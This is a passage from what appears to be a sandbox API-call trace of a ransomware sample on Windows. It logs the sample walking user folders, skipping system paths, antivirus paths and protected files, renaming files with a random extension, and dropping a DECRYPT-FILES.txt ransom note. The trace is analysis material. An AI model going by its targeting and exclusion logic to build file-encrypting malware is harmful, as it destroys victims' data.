lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0182.390] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0182.390] lstrlenA (lpString="DEBUGBREAK") returned 10 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0182.390] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0182.390] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0182.390] lstrlenA (lpString="DECODEPOINTER") returned 13 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0182.390] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0182.390] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0182.390] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0182.390] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0182.390] lstrlenA (lpString="DELETEATOM") returned 10 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0182.390] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0182.390] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0182.390] lstrlenA (lpString="DELETEFIBER") returned 11 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0182.390] lstrlenA (lpString="DELETEFILEA") returned 11 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0182.390] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0182.390] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0182.390] lstrlenA (lpString="DELETEFILEW") returned 11 [0182.390] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0182.391] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0182.391] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0182.391] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0182.391] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0182.391] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0182.391] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0182.391] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0182.391] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0182.391] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0182.391] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0182.391] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0182.391] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0182.391] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0182.391] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0182.391] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0182.391] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0182.391] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0182.391] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0182.391] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0182.392] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0182.392] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0182.392] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0182.392] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0182.392] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0182.392] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0182.392] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0182.392] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0182.392] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0182.392] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0182.392] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0182.392] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0182.392] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0182.392] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0182.392] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0182.392] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0182.393] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0182.393] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T") returned 102 [0182.393] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T.kuTzahs") returned 110 [0182.393] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.ae7ci9t"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T.kuTzahs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.ae7ci9t.kutzahs"), dwFlags=0x0) returned 1 [0182.393] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.394] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.394] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.394] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xac1cd7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail.aE7cI9T", cAlternateFileName="MAILRE~1.AE7")) returned 0 [0182.394] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.394] CloseHandle (hObject=0x274) returned 1 [0182.394] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0182.395] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0182.395] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0182.395] lstrcatW (in: lpString1="Start Menu", lpString2="\\" | out: lpString1="Start Menu\\") returned="Start Menu\\" [0182.395] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Program Files") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch=":\\Windows") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Games\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\All Users") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="AhnLab") returned 0x0 [0182.395] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.395] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0182.395] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.395] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\0a16c9.tmp") returned 86 [0182.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.403] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0182.403] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.403] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt") returned 93 [0182.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.403] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0182.404] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0182.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbd09a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbd09a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.405] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbd09a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbd09a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.405] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefbd09a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefbd09a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbd09a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.405] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.405] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.405] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.405] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.405] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.405] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.405] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0182.405] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.405] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" [0182.405] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\0a16c9.tmp" [0182.405] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.406] CloseHandle (hObject=0x0) returned 0 [0182.406] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.406] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.406] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.406] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0182.406] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.406] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0182.406] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0182.406] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0182.406] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0182.406] lstrcmpW (lpString1="Programs", lpString2=".") returned 1 [0182.406] lstrcmpW (lpString1="Programs", lpString2="..") returned 1 [0182.406] lstrcatW (in: lpString1="Programs", lpString2="\\" | out: lpString1="Programs\\") returned="Programs\\" [0182.406] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="Programs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Program Files") returned 0x0 [0182.406] StrStrW 